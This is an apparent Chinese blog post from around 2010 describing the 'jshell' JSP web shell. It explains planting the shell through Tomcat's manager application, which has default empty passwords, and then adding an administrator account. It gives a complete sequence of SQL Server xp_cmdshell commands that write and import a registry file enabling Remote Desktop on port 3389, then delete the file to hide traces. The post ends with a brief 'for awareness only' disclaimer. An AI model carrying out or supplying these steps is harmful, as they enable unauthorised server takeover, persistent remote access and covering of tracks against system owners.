jsp木马jshell

 一款不错的jsp木马，jshell最近发现修改版很多，而且功能也强大了好多。

首先介绍一下如何上载这款jsp木马，现在的jsp应用大多以tomcat发布，tomcat默认有两个管理应用，分别是admin和manager/html，如果在软件发布的时候没有更改密码或删除应用，就会造成很大的安全隐患，例如这两个应用的默认密码都为空，登录manager后，可以创建上传context应用，如果我们把这款jsp上传的话，基本上整个系统都在我们的掌控之下。

     可以执行系统命令，这时可以随便添加一个用户到系统中，然后把该用户添加到administrators用户组中，拿到超级权限，这时可以看看是否开通了3389端口，没开的话可以

//拿到sqlserver管理员密码时 “>”表示覆盖写入，“>>”表示追加写入
exec master.dbo.xp_cmdshell 'echo Windows Registry Editor Version 5.00 >3389.reg'
exec master.dbo.xp_cmdshell 'echo. >>3389.reg'
exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg'
exec master.dbo.xp_cmdshell 'echo "fDenyTSConnections"=dword:00000000 >>3389.reg'
exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg'
exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg'
exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg'
exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg'

//执行注册文件
exec master.dbo.xp_cmdshell 'regedit /s 3389.reg'
//毁尸灭迹
exec master.dbo.xp_cmdshell 'del 3389.reg'

 远程登录进去，呵呵，“为所欲为”

本篇只为交流，希望能引起管理员的重视，减少软件的安全隐患。特别是在软件不存在sql注入的情况下，往往令人费解，他是怎么突入进来了，通过tomcat这种漏洞或者算是管理员的疏忽，往往比sql注入更容易突破进来，而且危害也远远大于sql注入。

评论

1 楼 yunmoxue 2010-02-20  

谢谢.谢谢.